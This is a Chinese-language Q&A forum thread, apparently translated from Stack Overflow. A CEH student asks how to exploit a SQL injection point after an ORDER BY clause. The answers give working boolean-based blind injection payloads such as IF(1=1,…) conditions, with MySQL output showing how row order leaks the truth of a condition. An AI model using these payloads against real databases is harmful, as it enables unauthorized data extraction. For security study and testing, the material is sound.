我发现我的一个演示网站容易受到SQL INJECTION(我目前正在做CEH)
发现的注射点如下:
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [*INJECTION POINT FOUND HERE*]
现在我需要制作一些可以帮助我利用我发现的注入点的东西。据我所知,UNION SELECT在ORDER BY之后无法工作。但是,我确实认为盲sql注入可能如下所示工作
SELECT column_1,column_2,column_3 from table_1 where column_4='3' order by id [if 1=1 then 1,blank]
现在如果在注入点发布了1,则查询会给出错误,而如果它保持空白,则查询将执行...那么盲sql注入将起作用
有人可以帮助我在IF THEN ELSE中使用SQL制作查询,因为我不知道如何在sql中使用IF THEN ELSE ..
尝试注意但不能正常工作
(IF(1 = 2)然后1 endif)
完整查询
SELECT column_1, column_2, column_3 from `table_1` WHERE `column_4` = '[*available injection point*]' order by id [*available injection point*] ASC limit [*available injection point*],[*available injection point*]
答案 0 :(得分:0)
如果id在结果集中不唯一,并且每个id有另一列的值是唯一的,则可以执行以下操作:
, unique_per_id标识每个ID值的唯一顺序(必须与id不同,必要时在desc上使用id。, IF(1=1,unique_per_id,id)可以进行基于布尔的盲注射。示例:
mysql> select host,user from mysql.user order by user;
+-----------+------------------+
| host | user |
+-----------+------------------+
| localhost | root |
| 127.0.0.1 | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,host;
+-----------+------------------+
| host | user |
+-----------+------------------+
| 127.0.0.1 | root |
| localhost | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,if(1=1,host,user);
+-----------+------------------+
| host | user |
+-----------+------------------+
| 127.0.0.1 | root |
| localhost | root |
+-----------+------------------+
2 rows in set (0.00 sec)
mysql> select host,user from mysql.user order by user,if(1=0,host,user);
+-----------+------------------+
| host | user |
+-----------+------------------+
| localhost | root |
| 127.0.0.1 | root |
+-----------+------------------+
2 rows in set (0.00 sec)
因此,只要结果集的if(expr,host,user)订单与仅host(第二次查询)的订单相同,条件expr就为真。
答案 1 :(得分:-1)
你可以注射:
+ IF(1=1, 1, 0)
结果查询将是:
SELECT column_1,column_2,column_3
from table_1
where column_4='3'
order by id + IF(1=1, 1, 0)